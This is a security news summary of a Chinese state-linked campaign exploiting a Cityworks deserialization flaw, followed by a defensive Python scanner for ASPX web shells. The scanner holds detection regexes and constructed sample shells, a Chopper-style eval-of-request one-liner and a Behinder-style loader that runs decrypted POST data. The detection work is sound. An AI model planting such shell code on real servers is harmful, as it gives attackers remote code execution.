Chinese state-linked threat group UAT-6382 exploited a deserialization vulnerability in Trimble Cityworks software to compromise U.S. local government networks.
The vulnerability, CVE-2025-0994, now has a vendor fix, but UAT-6382 has been exploiting it since January to breach municipal systems, drop Chinese-language web shells and custom malware, and pivot toward systems tied to utility networks. Applying the patch closes the entry point but does not remove implants already placed on a server that was compromised beforehand, so patched hosts still need to be checked.
UAT-6382 used the web shells AntSword, Chopper and Behinder, together with a Rust-based loader named TetraLoader, to maintain access, stage and steal sensitive files, and implant backdoors across compromised environments.
Cisco Talos has released indicators of compromise (IOCs) so organizations can detect and defend against similar intrusions; the campaign is another case of an APT reaching critical infrastructure through a known, patchable vulnerability rather than a novel one.
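The shells named above are ASP.NET pages dropped into the web root, so one practical check, beyond matching the published IOCs, is to sweep IIS-served script files for the behaviours those families share: a Chopper/AntSword-style page evaluates attacker input taken straight from the request, and a Behinder-style page decrypts the raw POST body and loads it as a .NET assembly. The script below is an added example, not Talos's code or its IOC list; its regexes are assumed generic signatures, the sample pages are constructed for the demonstration, and the assumption that Cityworks is served by IIS as ASPX is the author's, not the report's.

```python
"""Sweep an IIS web root for ASPX web shells of the kind named in the report.
Added example: the patterns are assumed generic signatures, not Talos IOCs."""
from __future__ import annotations

import re
import tempfile
from pathlib import Path

# Extensions IIS will execute server-side; a shell parked as .txt is inert
# until renamed, so these are the files that matter.
ASPX_EXTENSIONS = {".aspx", ".ashx", ".asmx", ".asax", ".ascx", ".soap"}

# Strong signals: every regex in the list must match. No legitimate page hands
# request-controlled data to an evaluator or to the CLR loader.
STRONG_PATTERNS = {
    # Chopper / AntSword style: eval(Request.Item["pwd"], "unsafe")
    "eval_of_request": [re.compile(
        r"\beval\s*\(\s*Request(\.Item|\.Form|\.Params|\.QueryString)?\s*[\[(]", re.I)],
    # Behinder style: read the raw POST body, decrypt it, Assembly.Load() it
    "assembly_load_of_request_body": [re.compile(r"Assembly\.Load\s*\(", re.I),
                                      re.compile(r"Request\.BinaryRead\s*\(", re.I)],
}
# Weak signals: only worth a look when two or more coincide.
WEAK_PATTERNS = {
    "jscript_page_directive": re.compile(r'<%@\s*Page\s+Language\s*=\s*"?JScript"?', re.I),
    "cjk_text": re.compile(r"[\u4e00-\u9fff]"),  # Chinese-language comments or strings
    "session_key_stash": re.compile(r"Session\.Add\s*\(|Session\s*\[", re.I),
}


def classify(source: str) -> tuple[str, list[str]]:
    """Return (verdict, matched pattern names) for the text of one script file."""
    strong = [n for n, pats in STRONG_PATTERNS.items() if all(p.search(source) for p in pats)]
    weak = [n for n, p in WEAK_PATTERNS.items() if p.search(source)]
    if strong:
        return "suspicious", strong + weak
    if len(weak) >= 2:
        return "review", weak
    return "clean", weak


def hunt(web_root: Path, min_mtime: float | None = None) -> list[dict]:
    """Walk web_root and report every executable script file that is not clean.
    min_mtime (POSIX seconds) narrows the sweep to files touched since the
    suspected intrusion window, which is the first thing to look at."""
    findings = []
    for path in sorted(web_root.rglob("*")):
        if not path.is_file() or path.suffix.lower() not in ASPX_EXTENSIONS:
            continue
        st = path.stat()
        if min_mtime is not None and st.st_mtime < min_mtime:
            continue
        verdict, hits = classify(path.read_text(encoding="utf-8", errors="replace"))
        if verdict != "clean":
            findings.append({"path": path.relative_to(web_root).as_posix(),
                             "verdict": verdict, "hits": hits, "size": st.st_size})
    return findings


# Constructed sample web root (not captured shells): a legitimate page, a
# Chopper/AntSword-style one-liner, and a Behinder-style loader with a
# Chinese comment, written the way such a shell is typically structured.
SAMPLES = {
    "Default.aspx": '<%@ Page Language="C#" %>\n<html><body><h1>Asset Management</h1></body></html>\n',
    "images/x.aspx": '<%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>',
    "upload/s.aspx": ('<%@ Page Language="C#" %><%@Import Namespace="System.Reflection"%>'
                      '<%Session.Add("k","0123456789abcdef"); /* 上传 */ '
                      'byte[] k=System.Text.Encoding.Default.GetBytes(Session[0]+""),'
                      'c=Request.BinaryRead(Request.ContentLength);'
                      'Assembly.Load(Decrypt(k,c)).CreateInstance("U").Equals(this);%>'),
}


def demo(min_mtime: float | None = None) -> list[dict]:
    """Materialise SAMPLES in a temporary web root and sweep it."""
    with tempfile.TemporaryDirectory() as d:
        root = Path(d)
        for rel, body in SAMPLES.items():
            target = root / rel
            target.parent.mkdir(parents=True, exist_ok=True)
            target.write_text(body, encoding="utf-8")
        return hunt(root, min_mtime)


if __name__ == "__main__":
    for f in demo():
        print(f"{f['verdict']:<10} {f['path']:<20} hits={','.join(f['hits'])}")
```

Run it against a real web root with `hunt(Path(r"C:\inetpub\wwwroot"), min_mtime=...)` set to the start of the exposure window; anything it flags should be triaged by hand, and the weak signals (a JScript page directive, CJK text, a value stashed in Session) are deliberately not enough on their own, because localized or legacy applications trip them legitimately.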